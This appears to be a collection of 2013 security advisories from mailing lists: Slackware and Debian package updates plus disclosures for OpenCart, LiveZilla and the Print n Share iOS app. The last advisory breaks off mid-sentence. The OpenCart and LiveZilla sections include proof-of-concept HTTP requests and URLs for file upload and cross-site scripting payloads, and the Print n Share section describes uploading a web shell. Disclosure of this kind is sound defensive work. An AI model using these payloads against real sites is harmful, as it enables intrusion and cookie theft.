ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/xap/seamonkey-2.22.1-i486-1.txz Updated packages for Slackware x86_64 -current: ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/l/seamonkey-solibs-2.22.1-x86_64-1.txz ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/xap/seamonkey-2.22.1-x86_64-1.txz MD5 signatures: +-+ Slackware 14.0 packages: b315acb9ea10513ff46123c075f82820 seamonkey-2.22.1-i486-1_slack14.0.txz a53c11c7ab826f27815e89d1ae39f368 seamonkey-solibs-2.22.1-i486-1_slack14.0.txz Slackware x86_64 14.0 packages: 97ee71cc5f91efd556ad29baa4695bb2 seamonkey-2.22.1-x86_64-1_slack14.0.txz 7eaab4ea075b79f0b67894e5b8fc8782 seamonkey-solibs-2.22.1-x86_64-1_slack14.0.txz Slackware 14.1 packages: 9d2fddecd536ed84b76c7b134c440d77 seamonkey-2.22.1-i486-1_slack14.1.txz 50cb6c7e926a98552837e51294906d63 seamonkey-solibs-2.22.1-i486-1_slack14.1.txz Slackware x86_64 14.1 packages: f40c8b4207c4e4d2a521cc4cc0b17722 seamonkey-2.22.1-x86_64-1_slack14.1.txz 9e155f4b9a9f241030436926970002ca seamonkey-solibs-2.22.1-x86_64-1_slack14.1.txz Slackware -current packages: b42a26ca28c58839abed995ad9962415 l/seamonkey-solibs-2.22.1-i486-1.txz e1cab57251ca72b8cf82d6749959a1ea xap/seamonkey-2.22.1-i486-1.txz Slackware x86_64 -current packages: 7146b57158804ae43e644da69f3ca18a l/seamonkey-solibs-2.22.1-x86_64-1.txz 153ebf91193138b897b66b581b6c57c1 xap/seamonkey-2.22.1-x86_64-1.txz Installation instructions: ++ Upgrade the packages as root: # upgradepkg seamonkey-2.22.1-i486-1_slack14.1.txz seamonkey-solibs-2.22.1-i486-1_slack14.1.txz +-+ Slackware Linux Security Team http://slackware.com/gpg-key secur...@slackware.com ++ | To leave the slackware-security mailing list: | ++ | Send an email to majord...@slackware.com with this text in the body of | | the email message: | || | unsubscribe slackware-security | || | You will get a confirmation message back containing instructions to| | complete the process. Please do not reply to this email address. | ++ -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.15 (GNU/Linux) iEYEARECAAYFAlKhGK4ACgkQakRjwEAQIjOKNwCeM22go773N6aGqZPgjMaSc0xi DpQAn2NsPT3B1PK2svYl9qAHmggSQkkD =lQct -END PGP SIGNATURE-
[slackware-security] hplip (SSA:2013-339-04)
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 [slackware-security] hplip (SSA:2013-339-04) New hplip packages are available for Slackware 14.0 to fix a security issue. Here are the details from the Slackware 14.0 ChangeLog: +--+ patches/packages/hplip-3.12.9-i486-4_slack14.0.txz: Rebuilt. This update disables the automatic upgrade feature which can be easily fooled into downloading an arbitrary binary and executing it. This issue affects only Slackware 14.0 (earlier versions do not have the feature, and newer ones had already disabled it). For more information, see: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6427 (* Security fix *) +--+ Where to find the new packages: +-+ Thanks to the friendly folks at the OSU Open Source Lab (http://osuosl.org) for donating FTP and rsync hosting to the Slackware project! :-) Also see the Get Slack section on http://slackware.com for additional mirror sites near you. Updated package for Slackware 14.0: ftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/hplip-3.12.9-i486-4_slack14.0.txz Updated package for Slackware x86_64 14.0: ftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/hplip-3.12.9-x86_64-4_slack14.0.txz MD5 signatures: +-+ Slackware 14.0 package: 6838bc89361bf4dd0011ad4d46b98bf0 hplip-3.12.9-i486-4_slack14.0.txz Slackware x86_64 14.0 package: a5193660b2318e29aa5586ead1feb126 hplip-3.12.9-x86_64-4_slack14.0.txz Installation instructions: ++ Upgrade the package as root: # upgradepkg hplip-3.12.9-i486-4_slack14.0.txz +-+ Slackware Linux Security Team http://slackware.com/gpg-key secur...@slackware.com ++ | To leave the slackware-security mailing list: | ++ | Send an email to majord...@slackware.com with this text in the body of | | the email message: | || | unsubscribe slackware-security | || | You will get a confirmation message back containing instructions to| | complete the process. Please do not reply to this email address. | ++ -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.15 (GNU/Linux) iEYEARECAAYFAlKhGLEACgkQakRjwEAQIjOXJACeII9YkNxj5hCdV8IsolOSPAyY oacAn0ha/+Utsg/q+1av9T7vJ770HDJS =3mBc -END PGP SIGNATURE-
Opencart Multiple Vulnerabilities
### # Title: Opencart Multiple Vulnerabilities # Vendor: http://www.opencart.com # Vulnerabilities: Arbitrary File Upload, XSS, Path Disclosure # Vulnerable Version: opencart 1.5.6 (prior versions also may be affected) # Exploitation: Remote with browser # Impact: High # Vendor Supplied Patch: N/A # Original Advisory with Workaround: # http://www.garda.ir/Opencart_Multiple_Vulnerabilities.html ### - Description: Quote from vendor: OpenCart is a turn-key ready out of the box shopping cart solution. You simply install, select your template, add products and you're ready to start accepting orders. - Vulnerability: In the process of optimizing our crawler engine by garda.ir (garda.ir is a Persian online shopping price comparison service which uses new search engine technologies to grab prices) we found file upload vulnerability in opencart application, further investigation lead us to discover other vulnerabilities such as path disclosure and xss. - POC: # 1 # File Upload # Insufficient Authorization in /catalog/controller/product/product.php # Result: testupload.txt.somehash is created in /download folder POST /opencart-1.5.6/index.php?route=product/product/upload HTTP/1.1 Host: example.com Content-Type: multipart/form-data; boundary=---4827543632391 Content-Length: 206 Connection: Keep-Alive -4827543632391 Content-Disposition: form-data; name=file; filename=testupload.txt Content-Type: text/plain testtesttest -4827543632391-- # 2 # Reflected XSS and Path Disclosure # Input Validation Error in /catalog/controller/account/register.php # Result: this will cause arbitrary scripting code to be executed by the # target user's browser. POST /opencart-1.5.6/index.php?route=account/register HTTP/1.1 Content-Type: multipart/form-data; boundary=---1e7a98bc645efbe7 Content-Length: 181 Host: example.com Connection: Keep-Alive -1e7a98bc645efbe7 Content-Disposition: form-data; name=zone_id 12345'+alert(document.cookie)+' -1e7a98bc645efbe7-- # 3 # Information Leakage Path Disclosure # Insufficient Authorization in /system/logs/error.txt # Result: Information Disclosure http://www.example.com/opencart-1.5.6/system/logs/error.txt - Solution: There is no Vendor Supplied Patch at the time of this entry. For workaround check the Original Advisory. - Credit: Discovered by: trueend5 (trueend5 [at] yahoo com) This advisory is sponsored by garda.ir http://www.garda.ir A Persian online shopping price comparison service
[SECURITY] [DSA 2811-1] chromium-browser security update
-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 - - Debian Security Advisory DSA-2811-1 secur...@debian.org http://www.debian.org/security/ Michael Gilbert December 07, 2013 http://www.debian.org/security/faq - - Package: chromium-browser Vulnerability : several Problem type : remote Debian-specific: no CVE ID : CVE-2013-6634 CVE-2013-6635 CVE-2013-6636 CVE-2013-6637 CVE-2013-6638 CVE-2013-6639 CVE-2013-6640 Several vulnerabilities have been discovered in the chromium web browser. CVE-2013-6634 Andrey Labunets discovered that the wrong URL was used during validation in the one-click sign on helper. CVE-2013-6635 cloudfuzzer discovered use-after-free issues in the InsertHTML and Indent DOM editing commands. CVE-2013-6636 Bas Venis discovered an address bar spoofing issue. CVE-2013-6637 The chrome 31 development team discovered and fixed multiple issues with potential security impact. CVE-2013-6638 Jakob Kummerow of the Chromium project discoved a buffer overflow in the v8 javascript library. CVE-2013-6639 Jakob Kummerow of the Chromium project discoved an out-of-bounds write in the v8 javascript library. CVE-2013-6640 Jakob Kummerow of the Chromium project discoved an out-of-bounds read in the v8 javascript library. For the stable distribution (wheezy), these problems have been fixed in version 31.0.1650.63-1~deb7u1. For the testing distribution (jessie), these problems will be fixed soon. For the unstable distribution (sid), these problems have been fixed in version 31.0.1650.63-1. We recommend that you upgrade your chromium-browser packages. Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: http://www.debian.org/security/ Mailing list: debian-security-annou...@lists.debian.org -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.15 (GNU/Linux) iQQcBAEBCgAGBQJSo+2XAAoJELjWss0C1vRzcIcf/0IeLihtqzUhizWyxZEDPlEq ZWfz1Vjo42ZqDJDacvh5HqdLARgVXsiRhJFqmcuThOxJGWR961zJEBCVa0uXbqpN TuRI+YY7viTyrBXCa29RX9cB/EADmkqeFswMb1RpcgbmxJaSoOUU0bdqX2fOrN8E yDTwSe//XQRinGuajNiBO1sWyGmRzquZnZwgmWL37raqg8eLKhHvYeuL+TQvVQwi 9/orPVoMELNDKrlupWFXChZSvc8kUuXAuBk0UI4OlTupsscsiaEWOdcPRssTwIO+ Zk9j7XS1OxZAcHD4iO8BeiGJjjymUvcqB7w8dv/S/2ehAYlptab0QNzsG//FTKGa UuNgzD2d8ntMcXSXdcs2BqmWYFF2CI1hQYgCdSUGAp5nRjp8Y3TV+VykmgzjzMHN nOIEXOHSsagMbn1pfmEn8mYv/Hkz38f04LStchD62Mvb9QHXQNtr9TOiJ3wbz3UI wNN1faGePKz6bO3X2tSQboWmKjOfDL5XBJC27Jovpbyqk8zDA5ConHshkxSL7SPX 2MjMjbSUO1rpjehA1PLuruOwVQd1uRL/IgEhAqMWlXcwFI3Lo8C3pZfRHuuTQpJx zUbVq6Kr88EoXfF7P6KnYd10C8mOwMu6Hj5iB/go7gOEiXrqGVa2KlVTVhVege9P WDFweF5dYYhZ1kAB5nxzza5KZJtXX9aFkAK1fmyEc7CwyRB19r+Sm3TQwstgoF0t 0CPCwqQJNG2kLsir4nnB6mcJX9pkwX469qSeWul+3pp5026KmVGXhGtk7pcdIN7j Qyav6UD2bywqt+5RaIIp+hygo1ZOkJ0bhni4PUK1IdCwC3aZqf1pukguBDy7zZb7 UqEzRyoaLgH0S0tmGnvFj/gRWMzkyxXLS/U84d/rBLVV61Irig/4G+gNlAaF2t1p aSluBs5OOuGmyYNzQgs8jNmGdUR4Rx4l7a0Nol9jw8nwMMTjp7VQRUB4uMEWVOQ1 4ooAJ2ne3vqupJ1E21zk71d24+4MYrr/B2mXYQ0GsaDU+0bnODiEbKsliGwoRQGq 2ZXDzL+0SDLossIPYLWTx1s+DChrzoEVdp6n/3z6uul9/AzNc6U2FsCU1XAh3G/+ 7LDqBIcnRX/fQ9p1yxPwo16kko5mJQlKkqgI9IDpNM/Lg7FCVl4+yE7uqR1B1fsc WJN+t0M9uEO6EMO4pK/c91Xna2JP7xVcqsaCf1QI3WhNQnHoGzSX7E/BZYDkUmlR kdkBp6F4izLt3hrz0qaVgIrslrPNwHphMOIlX/TzPMhY6etqQLQ8GXIS7SbqgG53 yWLQbsqo+1/d5QtTox5JfPFFTRCLKJGP8UrHjN7ZMmlBnTuZ5jR0oO+ITube2pM= =5Qyo -END PGP SIGNATURE-
LiveZilla 5.1.0.0 Reflected XSS in translations
Author: Jakub Zoczek [zoc...@gmail.com]
CVE Reference: CVE-2013-7002
Product: LiveZilla
Vendor: LiveZilla GmbH [http://livezilla.net]
Affected version: 5.1.0.0
Severity: Medium
CVSSv2 Score: 4.3 (AV:N/AC:M/Au:N/C:N/I:P/A:N)
Status: Fixed
0x01 Background
LiveZilla, the widely-used and trusted Live Help and Live Support System.
0x02 Description
LiveZilla in version 5.1.0.0 is prone to Reflected Cross-Site Scripting issue
in translation PHP script used to generate JSON with connections between origin
and destination languages. Content type is text/html and g_language GET
variable is displayed without sanitization, which make the script vulnerable.
0x03 Proof of Concept
http://hostname/livezilla/mobile/php/translation/index.php?g_language=f;img
src=a onerror=alert('XSS')h
0x04 Fix
Vulnerability was fixed in LiveZilla 5.1.1.0 version.
0x05 Timeline
20.11.2013 - Vendor notified
21.11.2013 - Fix released, vendor responded
09.12.2013 - Public Disclosure
Print n Share v5.5 iOS - Multiple Web Vulnerabilities
Document Title: === Print n Share v5.5 iOS - Multiple Web Vulnerabilities References (Source): http://www.vulnerability-lab.com/get_content.php?id=1154 Release Date: = 2013-12-06 Vulnerability Laboratory ID (VL-ID): 1154 Common Vulnerability Scoring System: 9.2 Product Service Introduction: === Print directly to the widest range of network or WiFi printers, without a computer or AirPrint! Alternatively print via your Mac/PC to ALL printers including USB Bluetooth printers. Print... documents cloud files,web pages,emails, attachments, photos, contacts, calendars, clipboard items, convert to PDF and much more - to ANY PRINTER! (Copy of the Homepage: https://itunes.apple.com/en/app/print-n-share-der-all-in-one/id301656026 Abstract Advisory Information: == The Vulnerability Laboratory Research Team discovered multiple web vulnerabilities in the Print n Share v5.5 mobile application for apple iOS. Vulnerability Disclosure Timeline: == 2013-12-01:Public Disclosure (Vulnerability Laboratory) Discovery Status: = Published Affected Product(s): EuroSmartz Ltd Product: Print n Share 5.5 Exploitation Technique: === Remote Severity Level: === Critical Technical Details Description: 1.1 A local file/path include web vulnerability has been discovered in the official Print n Share v5.5 mobile application for apple iOS. The file include vulnerability allows remote attackers to include (upload) local file or path requests to compromise the application or service. The remote file include web vulnerability is located in the import file module in the filename value. Remote attackers can inject own files or path requests by adding regular text files (add). It is also possible to use the `rename` or `import` function to inject. The file include and path request execute occurs in the main file dir index or subcategory listing of the mobile application. The security risk of the local file include web vulnerability is estimated as high(+) with a cvss (common vulnerability scoring system) count of 8.4(+). Exploitation of the local file include web vulnerability requires no user interaction or privileged web-application user account with password. Successful exploitation of the vulnerability results in unauthorized local file uploads and path requests to compromise the device or mobile app. Request Method(s): [+] [POST] Vulnerable Inputs(s): [+] Neue Text Datei (New Text File) [+] Umbenennen File (Rename File) Vulnerable Parameter(s): [+] filename Affected Module(s): [+] Index File Dir Listing (http://localhost:8080) 1.2 An arbitrary file upload web vulnerability has been discovered in the official Print n Share v5.5 mobile application for apple iOS. The arbitrary file upload issue allows remote attackers to upload files with multiple extensions to bypass the web-server or system validation. The vulnerability is located in the import file module. Remote attackers are able to upload a php or js web-shells by renaming the file with multiple extensions to bypass the file restriction mechanism. The attacker uploads for example a web-shell with the following name and extension `image.jpg.gif.js.php.jpg`. After the upload the attacker needs to open the file in the web application. He deletes the .jpg . gif file extension and can access the application with elevated access rights. The security risk of the arbitrary file upload web vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 7.8(+). Exploitation of the arbitrary file upload web vulnerability requires no user interaction or privilege application user account with password. Successful exploitation of the vulnerability results in unauthorized file access because of a compromise after the upload of web-shells. Request Method(s): [+] [POST] Vulnerable Module(s): [+] File Import Vulnerable Inputs(s): [+] Importieren - File Sync Vulnerable Parameter(s): [+] filename (multiple extensions) Affected Module(s): [+] File Path Listing (http://localhost:8080) 1.3 A persistent input validation web vulnerability has been discovered in the official Print n Share v5.5 mobile application for apple iOS. The (persistent) vulnerability allows remote attacker to inject own malicious script code on the application-side of the mobile application. The
